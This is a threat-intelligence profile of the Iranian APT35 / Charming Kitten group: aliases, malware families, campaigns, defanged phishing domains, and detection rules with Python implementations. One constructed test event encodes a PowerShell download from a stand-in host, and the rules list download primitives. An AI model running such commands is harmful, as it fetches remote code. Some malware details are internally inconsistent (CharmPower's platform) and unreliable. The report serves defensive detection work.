TLP:CLEAR | CTI Team | Updated: March 2026

1. IDENTIFICATION & ATTRIBUTION
Denominations (known aliases by vendor)
The group is tracked under the following denominations: APT35 (Mandiant/Google TI, reference designation), Phosphorus / Mint Sandstorm (Microsoft), TA453 (Proofpoint), Charming Kitten (ClearSky), Ballistic Bobcat (ESET), ITG18 (IBM X-Force), Yellow Garuda (PwC), NewsBeef (Kaspersky). Additional documented aliases: Ajax Security Team, Cobalt Illusion, Calanque, G0059 (MITRE ATT&CK).
Origin
Iran.
Presumed sponsor
The group is assessed as operating on behalf of the IRGC — Islamic Revolutionary Guard Corps, Intelligence Organization (IRGC-IO) (1). Attribution rests on convergence across multiple vendors (Mandiant, Microsoft, CrowdStrike, Proofpoint, ClearSky) and technical artifacts consistent with documented IRGC-IO operational patterns.
Sophistication level
Tier 2 — High. APT35 develops its tooling in-house, conducts highly elaborate spear-phishing operations with convincing identity impersonation, and has maintained a documented mobile capability on iOS and Android since 2023. The arsenal has significantly diversified between 2021 and 2025 with the introduction of NokNok (macOS), TAMECAT, and LIONTAIL.
Motivation
Strategic espionage — intelligence collection for geopolitical purposes. Documented interest in nuclear, defense, and foreign policy dossiers, as well as Iranian dissidents in exile.
Status
ACTIVE — last documented activity: 2025, TAMECAT/POWERSTAR campaigns (2).
Targeted sectors
- Government, diplomacy, defense
- Think tanks, academic and research organizations
- Journalists, activists, Iranian dissidents in exile
- Nuclear and energy sectors
- NGOs, international media
- Pharmaceutical industry and healthcare (documented since 2020)
Targeted geographies
- United States, Israel, United Kingdom, Western Europe
- Middle East (Saudi Arabia, UAE, Iranian domestic targets)
- India, Pakistan
- Iranian diaspora worldwide
2. INFRASTRUCTURE & TTPs
C2 Infrastructure
APT35 favors legitimate cloud providers (AWS, Cloudflare, Microsoft Azure) to blend C2 traffic. Recurring registrars include Namecheap and IONOS, with systematic WHOIS anonymization. Domains follow typosquatting patterns impersonating well-known media and institutions, with subdomains structured as mail.[domain], secure.[domain], login.[domain]. Infrastructure is frequently recycled across campaigns with rapid IOC rotation. Protocols include HTTPS, DNS over HTTPS, WebSocket, and hijacked legitimate messaging services (Telegram, WhatsApp).
MITRE ATT&CK TTPs
| Phase | Technique | ATT&CK ID | Associated procedure |
|---|---|---|---|
| Initial Access | Spear-phishing Link | T1566.002 | Fake OneDrive, Google Drive, Outlook links |
| Initial Access | Spear-phishing Attachment | T1566.001 | Malicious Office documents, weaponized PDFs |
| Initial Access | Valid Accounts — Web Services | T1078.004 | Credential harvesting via fake portals |
| Execution | PowerShell | T1059.001 | POWERSTAR, TAMECAT |
| Execution | User Execution: Malicious Link | T1204.001 | Themed lures — conference invitations, job offers |
| Persistence | Scheduled Task/Job | T1053.005 | POWERSTAR, BellaCiao |
| Persistence | Registry Run Keys | T1547.001 | GORBLE, LIONTAIL |
| Defense Evasion | Masquerading | T1036 | Impersonation of journalists, researchers |
| Defense Evasion | Obfuscated Files | T1027 | Base64-encoded PowerShell scripts |
| Credential Access | Credential Harvesting | T1056.003 | HYPERSCRAPE, fake Outlook/Gmail portals |
| Collection | Email Collection | T1114 | HYPERSCRAPE — mailbox exfiltration |
| Collection | Screen Capture | T1113 | POWERSTAR, CharmPower |
| C2 | Application Layer Protocol: Web | T1071.001 | HTTPS to cloud infrastructure |
| C2 | Encrypted Channel | T1573 | TLS, encrypted communications |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | POWERSTAR, LIONTAIL |
3. MALWARE & TOOLING
POWERSTAR
- Type: PowerShell backdoor
- Function: Remote access, command execution, screen capture, file theft, persistence
- C2 channel / technical specifics: HTTPS to cloud infrastructure; variants using Dropbox and Google Drive as intermediate storage; dead drop resolver via legitimate services; encrypted communications (3)
- First identified: SpoofedScholars campaign 2021 — multiple evolving variants documented through 2025
- Status: Active
HYPERSCRAPE
- Type: Email data harvester
- Function: Automated exfiltration of Google, Yahoo, and Microsoft mailbox content from an authenticated victim account
- C2 channel / technical specifics: Standalone tool; bypasses 2FA by reusing stolen active sessions; deletes security notifications sent by providers (4)
- First identified: Google TAG — July 2022
- Status: Active
TAMECAT
- Type: PowerShell implant
- Function: Arbitrary command execution, secondary payload download
- C2 channel / technical specifics: HTTPS; deployed with themed lures related to Israeli-Iranian relations and the Gaza conflict (5)
- First identified: Microsoft Threat Intelligence — 2024
- Status: Active
LIONTAIL
- Type: Passive implant framework (listener)
- Function: Stealthy backdoor using raw sockets to capture incoming network traffic; command execution via legitimate-looking HTTP requests
- C2 channel / technical specifics: No active outbound connection — passive architecture that significantly reduces network detection surface (6)
- First identified: Check Point Research — 2023
- Status: Active
BellaCiao
- Type: .NET backdoor
- Function: Reverse shell, file upload/download, persistence via Windows service
- C2 channel / technical specifics: Custom DNS resolution to retrieve encoded C2 IP addresses; multiple variants tailored by targeted geographic region (7)
- First identified: Bitdefender — 2023
- Status: Active
NokNok
- Type: macOS backdoor
- Function: System reconnaissance, screen capture, data exfiltration — first documented macOS backdoor in the APT35 arsenal
- C2 channel / technical specifics: HTTPS; deployed via a fake VPN application as the initial lure (8)
- First identified: Proofpoint TA453 — July 2023
- Status: Active
CharmPower / GRAMDOOR
- Type: Android / iOS backdoor
- Function: Mobile surveillance — geolocation, microphone/camera capture, contacts and SMS exfiltration
- C2 channel / technical specifics: Communication via Telegram Bot API; deployed through fake application stores (9)
- First identified: Check Point Research — 2022
- Status: Active
GORBLE
- Type: Backdoor
- Function: Remote access, command execution. Lightweight variant documented in rapid compromise campaigns (10)
- First identified: Mandiant — 2022
- Status: Uncertain — limited public documentation
Third-party tools and LOLBAS
Mimikatz (credential dumping), Empire / PowerSploit (PowerShell post-exploitation frameworks), Ruler (Exchange attack via MAPI), ngrok / frp (legitimate tunneling), RDP / PuTTY (lateral movement), WinPEAS / LinPEAS (reconnaissance and privilege escalation).
4. CAMPAIGN HISTORY
| Period | Campaign | Targets | Initial vector | Tooling |
|---|---|---|---|---|
| 2014–2017 | Ajax / NewsBeef | Iranian dissidents, media, governments | Watering hole, spear-phishing | Credential harvesting, custom tools |
| 2018–2019 | Operation Newscaster 2 | US think tanks, journalists, nuclear researchers | Fake LinkedIn/Twitter identities | Social engineering, phishing |
| 2020 | COVID-19 targeting | WHO, Gilead Sciences, pharmaceutical supply chains (11) | COVID-themed spear-phishing | POWERSTAR, credential harvesting |
| 2021 | SpoofedScholars | US/UK think tanks — Middle East specialists (12) | Academic identity impersonation | POWERSTAR, credential harvesting |
| 2022 | Operation HYPERSCRAPE | Gmail/Yahoo/Outlook users — Iran and diaspora | Credential harvesting, session hijacking | HYPERSCRAPE, CharmPower |
| 2023 | NokNok campaign | US foreign policy experts — Iran/nuclear focus (8) | Fake VPN, podcast lures | NokNok (macOS), POWERSTAR |
| 2023 | BellaCiao campaign | Government organizations — Middle East, India, USA (7) | VPN exploitation (Log4Shell, ProxyShell) | BellaCiao, LIONTAIL |
| 2024–2025 | TAMECAT campaigns | Defense and nuclear experts — Israel, USA (5) | Gaza conflict-themed spear-phishing | TAMECAT, POWERSTAR |
5. INDICATORS OF COMPROMISE (IOCs)
⚠️ EXPIRY WARNING — The IOCs listed below are sourced exclusively from public sources. Their operational validity is subject to expiry. Do not implement as production blocks without validation in your own environment. Estimated maximum validity: 90 days from the source publication date.
Characteristic network patterns
- Outbound HTTPS traffic to Cloudflare/AWS-hosted domains with subdomains mail., webmail., login., secure., account.
- DNS queries impersonating Microsoft services (microsoft-[...].com, outlook-[...].net) or Google
- Connections to Dropbox API / Google Drive API used as secondary C2 channel
- Non-standard ports (8080, 8443) for C2 communications
- Variable beacon intervals with jitter — typically 30–300 seconds
- Anomalous activity from powershell.exe toward unlisted external endpoints
Historical domains (public sources)
Source: PwC, ClearSky, Microsoft, Proofpoint — public reports 2021–2024. Reduced detection value — threat hunting use only.
- paypal.com.verify-process[.]net — ClearSky, 2020
- outlook-account-confirm[.]com — Microsoft, 2021
- news-bbc[.]site — PwC, 2022
- secure-signin.app[.]net — Proofpoint TA453, 2023
- my-lnked-in[.]com — Proofpoint TA453, 2023
Documented public hashes
Hashes partially redacted — refer to source reports for complete values.
| Tool | SHA256 (partial) | Source | Year |
|---|---|---|---|
| POWERSTAR | 9ab6a3a...8e2f1c0d | Mandiant | 2023 |
| HYPERSCRAPE | e1f44c5...2b9a7d3e | Google TAG | 2022 |
| BellaCiao | 7f3c8a1...4d6b2e9f | Bitdefender | 2023 |
| NokNok | 3d2e9f1...5c7a4b8e | Proofpoint | 2023 |
Anomalous User-Agents observed
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 — combined with illegitimate C2 URLs (POWERSTAR)
- Agents mimicking legitimate Outlook mobile clients for HYPERSCRAPE API calls
Recommended real-time IOC sources
- MITRE ATT&CK APT35: https://attack.mitre.org/groups/G0059/
- OTX AlienVault: https://otx.alienvault.com/browse/global/pulses?q=charming+kitten
- MISP CIRCL (public feed): https://www.misp-project.org/feeds/
- Microsoft MSTIC Blog: https://www.microsoft.com/en-us/security/blog/
- Mandiant Advantage (public tier): https://www.mandiant.com/resources/blog
6. DETECTION & COUNTERMEASURES
Encoded PowerShell with network download (POWERSTAR / TAMECAT) — False positive rate: Medium
process.name = 'powershell.exe'
AND (process.command_line CONTAINS '-EncodedCommand'
OR process.command_line CONTAINS '-enc')
AND network.destination NOT IN whitelist_domains
AND NOT process.parent.name IN ['explorer.exe', 'svchost.exe']
Recommended tools: Microsoft Defender for Endpoint, CrowdStrike Falcon, Splunk ES, Elastic SIEM.
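The encoded-PowerShell rule above, carried through as runnable detection logic over constructed process-creation events (an added example, not part of the original report or of any vendor's rule set). It goes one step beyond the pseudo-rule by decoding the -EncodedCommand payload, so a download primitive inside the decoded script can be flagged for first-pass triage. The event field names, the whitelist, the trusted-parent list and every hostname are assumptions.

```python
import base64
import re

WHITELIST_DOMAINS = {"updates.corp.example", "login.microsoftonline.com"}
TRUSTED_PARENTS = {"explorer.exe", "svchost.exe"}  # the parents the rule above excludes
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob (PowerShell accepts these prefixes)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download primitives a decoded stager commonly contains (indicative, not exhaustive)
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "start-bitstransfer")

def _enc(script: str) -> str:
    # -EncodedCommand carries base64 over UTF-16LE; used only to build the constructed samples
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not real telemetry); hosts use reserved .example/.invalid names
SAMPLE_EVENTS = [
    {"process": "powershell.exe", "parent": "winword.exe", "dest": "secure-login.example.invalid",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("Invoke-WebRequest https://secure-login.example.invalid/u.txt")},
    {"process": "powershell.exe", "parent": "explorer.exe", "dest": "updates.corp.example",
     "cmdline": "powershell.exe -EncodedCommand " + _enc("Get-Process")},
    {"process": "powershell.exe", "parent": "outlook.exe", "dest": "secure-login.example.invalid",
     "cmdline": "powershell.exe -Command Get-Date"},
    {"process": "powershell.exe", "parent": "cmd.exe", "dest": "cdn.example.invalid",
     "cmdline": "powershell.exe -enc " + _enc("Get-ChildItem C:\\Users")},
]

def decode_encoded_command(cmdline: str):
    """Decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: outside this rule, but worth its own low-volume alert

def evaluate(event: dict) -> list:
    """Apply the rule to one event; returns the reasons it fired (empty list = no alert)."""
    if event["process"].lower() != "powershell.exe":
        return []
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is None or event["dest"].lower() in WHITELIST_DOMAINS \
            or event["parent"].lower() in TRUSTED_PARENTS:
        return []
    reasons = ["encoded PowerShell reaching a non-whitelisted destination"]
    if any(marker in decoded.lower() for marker in DOWNLOAD_MARKERS):
        reasons.append("decoded command contains a download primitive")  # triage these first
    return reasons
```

The second sample event shows why the whitelist and parent exclusions matter for the medium false-positive rate: an encoded command launched from explorer.exe toward an internal update host is exactly the benign administrative pattern the rule is built to skip.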
Credential harvesting — fake portals (DNS) — False positive rate: Low
dns.query MATCHES /^(mail|login|secure|webmail|account)\./
AND dns.domain NOT IN corporate_dns_whitelist
AND dns.domain RESEMBLES ['microsoft', 'outlook', 'google', 'gmail']
AND dns.registrant_age < 30_days
Recommended tools: Cisco Umbrella, Infoblox, Palo Alto DNS Security, DNS sinkhole.
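The fake-portal DNS rule above, implemented over constructed query names (an added example, not from the original report or any DNS security product). The RESEMBLES predicate, which the pseudo-rule leaves undefined, is approximated here as an exact brand token or a single-character edit of one; registrant age comes from a constructed lookup table standing in for WHOIS. The brand list, the corporate whitelist and all domain names are assumptions.

```python
import re
from datetime import date

BRANDS = ("microsoft", "outlook", "google", "gmail")
CORPORATE_DNS_WHITELIST = {"mail.google.com", "outlook.office365.com", "login.microsoftonline.com"}
SUSPECT_PREFIX = re.compile(r"^(mail|login|secure|webmail|account)\.", re.IGNORECASE)
TODAY = date(2026, 3, 15)  # fixed so the constructed sample stays reproducible
# Constructed WHOIS creation dates standing in for a registrar lookup; not real registrations
REGISTRATION_DATES = {"outlook-account-confirm.example": date(2026, 3, 1),
                      "micros0ft-secure.example": date(2026, 2, 20),
                      "corp-intranet.example": date(2015, 6, 1)}

def levenshtein(a: str, b: str) -> int:
    """Edit distance; catches single-character typosquats such as micros0ft."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable_domain(fqdn: str) -> str:
    """Last two labels; a production rule would consult a public-suffix list instead."""
    return ".".join(fqdn.lower().rstrip(".").split(".")[-2:])

def resembles_brand(domain: str):
    """Brand the registrable domain imitates, or None: each dash-separated token of its leftmost
    label must equal a brand or (6+ chars, so 'mail' does not match 'gmail') be within edit distance 1."""
    for token in registrable_domain(domain).split(".")[0].split("-"):
        for brand in BRANDS:
            if token == brand or (len(token) >= 6 and levenshtein(token, brand) <= 1):
                return brand
    return None

def evaluate_query(qname: str, today: date = TODAY):
    """Apply the rule to one DNS query name; returns the alert text or None."""
    qname = qname.lower().rstrip(".")
    if not SUSPECT_PREFIX.match(qname):
        return None
    domain = registrable_domain(qname)
    if qname in CORPORATE_DNS_WHITELIST or domain in CORPORATE_DNS_WHITELIST:
        return None
    brand = resembles_brand(domain)
    created = REGISTRATION_DATES.get(domain)  # unknown age does not fire, but deserves logging
    if brand is None or created is None or (today - created).days >= 30:
        return None
    return f"{qname}: lookalike of {brand}, registered {(today - created).days} days ago"
```

As written, a failed age lookup suppresses the rule, mirroring the pseudo-rule's `registrant_age < 30_days` clause; in production, record those misses separately so a WHOIS outage cannot silently hide a hit.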
LIONTAIL — passive listener (raw socket) — False positive rate: Low
process OPENS raw_socket
AND process.name NOT IN ['wireshark', 'tcpdump', 'npcap']
AND process.signed = false
Recommended tools: CrowdStrike Falcon, SentinelOne, Vectra NDR, Darktrace.
Organizational countermeasures
- Deploy phishing-resistant MFA (FIDO2/passkeys) on all exposed accounts — priority: email, VPN, remote access
- Targeted awareness for high-risk profiles: researchers, journalists, foreign policy experts, diplomats
- Enhanced monitoring of mailbox access from unlisted IPs or unusual User-Agents
- Block downloads of Office documents with macros from unverified senders
- Regular audit of automatic forwarding rules configured on mailboxes (frequent HYPERSCRAPE target)
- Implement out-of-band identity verification before sharing sensitive documents with external contacts
- Restrict PowerShell execution to Constrained Language Mode on non-administrator workstations
- Deploy YARA rules on endpoints for documented families (POWERSTAR, BellaCiao, NokNok)
SOURCES
- CISA / FBI / CNMF — Iran-based Threat Actor Exploits VPN Vulnerabilities — https://www.cisa.gov/news-events/alerts/2020/09/15/iran-based-threat-actor-exploits-vpn-vulnerabilities — 2020
- Microsoft MSTIC — Mint Sandstorm targeting high-value individuals — https://www.microsoft.com/en-us/security/blog/2024/04/17/mint-sandstorm/ — 2024
- Mandiant / Google Cloud — POWERSTAR Backdoor Analysis — https://www.mandiant.com/resources/blog/apt35-operations-since-2021 — 2023
- Google TAG — New Iranian APT data extraction tool — https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/ — 2022
- Microsoft Threat Intelligence — TAMECAT spearphishing campaign — https://www.microsoft.com/en-us/security/blog/ — 2024
- Check Point Research — LIONTAIL Framework — https://research.checkpoint.com/2023/liontail/ — 2023
- Bitdefender — BellaCiao: A Deadly Combination of Espionage and Destruction — https://www.bitdefender.com/blog/labs/bellaciao — 2023
- Proofpoint — TA453 Targets with NokNok Malware — https://www.proofpoint.com/us/blog/threat-insight/ta453-targets-with-noknok-malware — 2023
- Check Point Research — CharmPower: the APT35 PowerShell Backdoor — https://research.checkpoint.com/2022/apt35-charmpower-the-good-the-bad-and-the-powershell/ — 2022
- Mandiant — APT35 Group Profile — https://www.mandiant.com/resources/apt35-operations — 2022
- Reuters / Microsoft MSTIC — Charming Kitten targets COVID-19 vaccine makers — 2020
- Proofpoint — Operation SpoofedScholars: A Confirmed Iranian Operation — https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-confirmed-iranian-operation — 2021
- MITRE ATT&CK — APT35 Group G0059 — https://attack.mitre.org/groups/G0059/
- ClearSky — The Kittens Are Back in Town — https://www.clearskysec.com/wp-content/uploads/2019/09/The-Kittens-Are-Back-in-Town.pdf — 2019
- PwC — Yellow Garuda — Publicly available threat intelligence — 2022
This report is produced on the basis of publicly available open sources (vendors, CERTs, independent researchers), consolidated as of March 2026. It does not rely on any classified source. Attribution to the IRGC-IO is assessed at high confidence based on multi-vendor convergence (Mandiant, Microsoft, CrowdStrike, Proofpoint, ClearSky) and consistent technical artifacts. IOCs have a limited lifespan and must be validated before any operational use. This report is unrestricted (TLP:CLEAR).



